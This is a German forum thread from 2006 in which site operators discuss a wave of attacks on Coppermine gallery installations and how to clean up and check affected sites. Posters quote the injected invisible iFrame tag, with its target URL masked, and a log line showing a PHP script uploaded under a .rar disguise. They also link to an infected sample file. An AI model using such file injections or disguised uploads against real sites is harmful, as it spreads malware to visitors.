Großangelegte Angriffe auf Seiten mit Coopermine

Begonnen von Highlander, 28 April 2006, 21:03:48

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 2 Gäste betrachten dieses Thema.

Highlander

Yellohost gab heute abend eine Dringende Sicherheitswarnung an seine Kunden heraus:

Auszug:
Zitatderzeit finden großangelegte Angriffe auf Webseiten, die das Galeriescript
Coppermine einsetzen statt. Hierbei wird ein iFrame in die Website
eingefügt,
welches bösartige Scripte enthält.
Falls sie Coppermine einsetzen, überprüfen sie dringend ( ich meine mit
dringend: jetzt!)
ihre Website. Sollten Fehlermeldungen im Header erhalten oder ihre Firewall
Warnmeldungen beim Aufruf ihrer Website erhalten, sperren sie zuerst den
Zugriff auf
ihre Website per .htaccess

Informieren sie sich dann über aktuelle Fixe von Coppermine und spielen
diese ein.

Gruß Manfred

FrankP

Wobei noch ein Nachtrag wichtig ist: Es betrifft nicht nur Coppermine, auch joomla/mambo und weitere sind betroffen. Ein pragma ist bislang nicht betroffen ( soweit wir Kenntnis haben ) - es schadet jedoch nicht, seine Site einfach mal zu überprüfen ( nicht mit dem IE, siehe hier:  http://secunia.com/advisories/15546/ ).
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

Snow2002

kann nur jedem empfehlen alles zu kontrollieren!
Bei mir sind seit gestern Abend 2 pragmamx, die mit Coppermine ausgestattet sind, und 1 wbb Board komplett verseucht! Das dingen kopiert sich rasend schnell in die Dateien ein...
Der iFrame ist übrigens dann am Ende der Datei zu finden.

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Moin :)

irgendwie blick ich das jetzt nicht richtig...

Kann mir mal Jemand sagen was da passiert und wie diese eigentlich uralte Lücke im Internetexplorer einen iFrame auf einen Webserver schleusen kann.
Nach was soll man die Webseite überprüfen?
Irgendwie sind die Informationen etwas dürftig.

So wie ich das verstehe, muss man Surfern mit dem Internetexplorer den Zugang zur Webseite verwehren, oder?

Hmmm, oder steh ich jetzt nur auf der Leitung.....
schön´s Grüssle, Andi

Snow2002

Guten Morgen Andi!

So richtig konnte ich meinen Provider gestern Abend auch nicht verstehen, jedenfalls sollte man Dateien, die Uploads in Coppermine erlauben(bzw. erlauben könnten entfernen. Ich hatte in der Coppermine die Uploadfunktion deaktiviert, wußte aber nicht das trotzdem Gefahr besteht.
Nun sind Tausende von Dateien infiziert auf dem Server. In allen möglichen und unmöglichen Dateien (die ich nun alle einzeln aufrufen und editieren darf) steht am Ende <iFRaMe FRAMeBORDER=0 heIGhT=0 wiDTh=0 Src=http://%*******></IFRAME>
Das verbreitet sich rasend schnell. Also für 1-2 Projekte von mir sehe ich erstmal schwarz :'(
Da auf dem gleichen webspace bei mir noch ein wbb läuft ist das dummerweise auch komplett verseucht worden.

Also wenn man eine Coppermine laufen hat sollte man die schnell checken, ob alles normal läuft.

Gruß, Marcus (der das Weekend vergessen kann)
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Oki, so langsam kommt Licht ins Dunkel..... ;)

Habe gerade mit Frank telefoniert...
Das Problem betrifft ALLE Scripte, mit denen Dateien hochgeladen werden können, nicht nur die Coppermine.

@ Snow2002
Hast du noch eine solche hochgeladene Scriptdatei verfügbar? Und auch eine der geänderten?
Sicher, dass der Angriff über die Coppermine gekommen ist und nicht evtl. über das wbb oder andere Uploadscripte? Das ipb ist nämlich auch betroffen.


Hmmm, zur Sicherheit werde ich hier mal die Avatarfunktion abschalten....
schön´s Grüssle, Andi

Snow2002

Hi!

Soweit ich das als Leie beurteilen kann dürfte der Angriff bei mir über Coppermine gekommen sein, weil dort der Fehler zuerst bemerkt wurde von unseren Usern. Das wbb war erst abends betroffen.
Auch sind speziell die Coppermine Dateien gründlich verseucht... im Spaw Ordner allerdings auch.
Hier ist mal eine betroffene Datei:
http://www.graffiti-dortmund.de/spaw_control.config.zip

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Hi :)

hmm, eine hochgeladene Datei wäre wichtiger. Hast die noch?

Wenn das über die Coppermine geschehen ist, dann müsste ja ein Eintrag in der DB darüber sein. Selbst wenn die hochgeladene Datei sich dann wieder gelöscht hat. Gibt es da Spuren?
schön´s Grüssle, Andi

Snow2002

hm.. wüßte gerade nicht wo ich das nachsehen sollte.. Mit raucht aber auch etwas dir Rübe im Moment... ???

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

#9
Jops, verständlich  :-X

Um Dir und den Anderen die Suche, nach potentiell gefährlichen Dateien zu erleichtern habe ich ein kleines script geschrieben.

Einfach die beiliegende Datei in das mx-root kopieren und aufrufen.

- Es werden sämtliche Dateien in allen Unterordnern angezeigt, die einen iFrame Tag im Code haben.
- Es werden alle Dateien angezeigt, die PHP- oder shell-Befehle im Code haben, die evtl. gefährliche Aktionen zulassen könnten. Hier sind die Dateien, die standardmässig zum pragmaMx gehören, ausgenommen. Es werden hier nur "Fremddateien" gelistet.

Naturgemäss sind da seeeehr viele Meldungen dabei, die nichts zu bedeuten haben. Das Ganze dient nur als grober Überblick.


@ Snow2002
Wenn es die Coppermine war...
Welche Dateitypen hattest du da zum Upload erlaubt?

[gelöscht durch Administrator]
schön´s Grüssle, Andi

m-t

Zitat von: Andi am 29 April 2006, 15:24:12
Einfach die beiliegende Datei in das mx-root kopieren und aufrufen.

Fatal error: Maximum execution time of 160 seconds exceeded in /home/www/np1xx/html/check.php on line 140

Andi

ZitatMaximum execution time of 160 seconds exceeded

Naja, entweder hast du auf deinem Webspace extrem viele Dateien, oder der Server ist etwas lahm ;)

Kannst mal in die Datei reinsehen, ziemlich oben steht der ini_set Befehl für 160 Sekunden. Den Wert kannst du einfach erhöhen.
schön´s Grüssle, Andi

Snow2002

Danke Andi!
Bei mir lief wohl auch durch meine Schuld einiges falsch. Laut Frank hat er noch nie eine soooo lange Liste gesehen.... Wir bekommen nun n Backup eingespielt!

Wie können wir uns denn schützen, außer den richtigen chmods? Sollen Dateien von Coppermine oder so raus?

Gruß, marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Moin :)

schwer zu sagen, weiss man denn jetzt genau, wie es passiert ist?

Die aktuelle mx-Coppermine hat noch ein ungefixtes Loch:
http://coppermine-gallery.net/forum/index.php?topic=30655.0
Aber ich kann mir absolut nicht vorstellen, dass damit ausgerechnet eine mx-Version so stark angegriffen werden sollte, wo hunderte ungefixte Standallone-Versionen online sind. Da müsste das Coppermine-Supportforum mehr über das Thema hergeben. Gerademal 1 Post befasst sich dort mit dem Thema: http://coppermine-gallery.net/forum/index.php?topic=30630.0

Im Laufe des Abends schiebe ich die aktualisierte Coppermine-Mx 1.4.5 in die Downloads...
schön´s Grüssle, Andi

Snow2002

Moin Meister!

Nein, woher nun genau der Angriff kam und wo das Unheil seinen Lauf nahm weiß ich nicht...
Wir haben auch unzählige Ordner usw. auf dem Webspace liegen, von denen leider einige auch den CHM 777 hatten. Unsere Schuld. Generell möchte ich halt so etwas nicht nochmal erleben und die scheinbar grenzenlose Geduld unserers Providers Yellohost überstrapazieren...

Das neue Update spiele ich dann drüber, sobald alles wieder läuft...

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Jop, das Yellohost Team ist suppi, gelle ;)

Zitat von: Andi am 29 April 2006, 15:24:12
Wenn es die Coppermine war...
Welche Dateitypen hattest du da zum Upload erlaubt?

Weisst du das noch, was da eingestellt war?
Denke, diese Option ist die grösste Gefahr bei der Coppermine und anderen Uploadscripten. Eben das, was erlaubt ist, hochzuladen...
schön´s Grüssle, Andi

Snow2002

Huhu!

Wir hatten schon länger gar keine Uploads mehr in der Coppermine erlaubt. Das die Dateien, die Uploads ermöglichen könnten trotzdem eine Gefahr sind wußte ich nicht. Aber auch die Upload-Funktion im Spaw war betroffen und da hatten wir zumindest Admins die Erlaubnis eingestellt Bilder hochzuladen.
Bin jetzt sehr sensibel, was Uploadmöglichkeiten angeht.

ZitatJop, das Yellohost Team ist suppi, gelle
Kann ich nur bestätigen, so einen Support und so eine Geduld kannte ich bis zu meinem Wechsel absolut nicht! Kann man an dieser Stelle ruhig mal sagen...

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

Andi

Hi :)
ZitatDas die Dateien, die Uploads ermöglichen könnten trotzdem eine Gefahr sind wußte ich nicht.
Hmm, wie das?
Diese Dateien, besonders in der Coppermine, benötigen um zu funktionieren, eine ganz genau definierte Umgebung, mit Funktionen aus anderen Dateien, Userberechtigungen und Variablen und Konstanten aus anderen Dateien. Ist das nicht gegeben, funktioniert der Upload nicht und das Script bricht ab. Die Coppermine Dateien lassen sich nicht direkt aufrufen, so dass man diese Umgebung "künstlich" erstellen könnte...

Gibt es da etwas mehr Info?
schön´s Grüssle, Andi

Musicman75

Ich hab die check.php auch mal auf meinen Webspace ins mx root kopiert um zu sehen, ob bei mir auch was betroffen ist.

Ist das normal, das manchmal bei dieser datei gar kein Output kommt?

bei mir ist safe mode on.
Unaufgeforderte Support PMs & Emails werden ignoriert

Immer erst die Boardsuche verwenden und gegebenenfalls einen neuen Threat eröffnen, wenn das Problem noch nicht behandelt wurde!

RiotheRat

ZitatAber auch die Upload-Funktion im Spaw war betroffen und da hatten wir zumindest Admins die Erlaubnis eingestellt Bilder hochzuladen

Sehr obskur ... der Editor lässt je nach Einstellung nur folgende Extensions durch:

  • .gif
  • .png
  • .fla
  • .swf
  • .bmp
  • .jpg
  • .jpeg

Die erlaubten Extensions werden innerhalb des Uploads nochmals gegengeprüft ... von daher sollte hier nichts anbrennen.

RtR
Unaufgeforderte PNs & Emails werden ignoriert

Erst wenn die letzte Zeile Code verhunzt, der letzte Server gehackt und der letzte Script-Kidde befriedigt ist, erst dann, werdet Ihr feststellen, dass Nuke nicht sicher ist...

m-t

Zitat von: Andi am 29 April 2006, 17:50:59
Naja, entweder hast du auf deinem Webspace extrem viele Dateien

Sind 4986 viel  ::) Habs jetzt mal auf 300 erhöht die Zeit läuft ab und das wars dann ...

Naja, bis jetzt hatte ich ja keine Probleme..

Andi

Hi :)

@ Snow2002

Was mir gerade zufällig begegnet ist:
http://www.pragmamx.org/forum-topic-15630.0.html
Zitathttp://xxxxx.de/html/modules/Forum/smf/index.php?name=Forum&amp;action=modifyModSettings 
8: Undefined variable: PHP_SELF
Datei: /home/www/dpsxxxxx/html/version2/html/blocks/block-Coppermine.php
Zeile: 15

Welche Coppermine Version war denn bei Dir da aktiv?
schön´s Grüssle, Andi

ReDOOM

Hallo,

die Coppermine Hacks laufen schon seit Wochen, mich hatte es Ende Februar erwischt. Saß aber zufällig gerade vor dem Rechner und konnte sofort reagieren bevor der Freak größeren Schaden anrichten konnten.

Zum Ablauf der Attack, über die .rar Uploadfunktion wurde dem server ein php script untergejubelt, schön im Logfile zu sehen

81.223.254.41 - - [27/Feb/2006:12:44:26 +0100] "POST /catalog/lang/setting.php.rar HTTP/1.1" 200 4828

Dummerweise war der server so eingerichtet das die getarnte .php Datei ausgeführt werden konnte nachdem der Angreifer den Speicherort ausfindig gemacht hatte.






Habe den Typ ausgesperrt, die Upload Funktionen von Coppermine erstmal deaktiviert und einen Aufrufs des scripts per .htacces auf eine Stinkefinger Grafik umgeleitet. Das hat ihn scheinbar so angepisst das er noch über eine Woche erfolglos versucht hat dem Server wieder etwas unterzujubeln *g*.

Denke das die iframe Geschichte sich auch so etwas in der Art zu nutze macht.

DOOM






Andi

schön´s Grüssle, Andi

Snow2002

Zitat von: Andi am 01 Mai 2006, 01:57:42
Welche Coppermine Version war denn bei Dir da aktiv?

Moin Andi!

Die 1.4.3 war aktiv... inzwischen 1.4.5 ;)

Gruß, Marcus
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4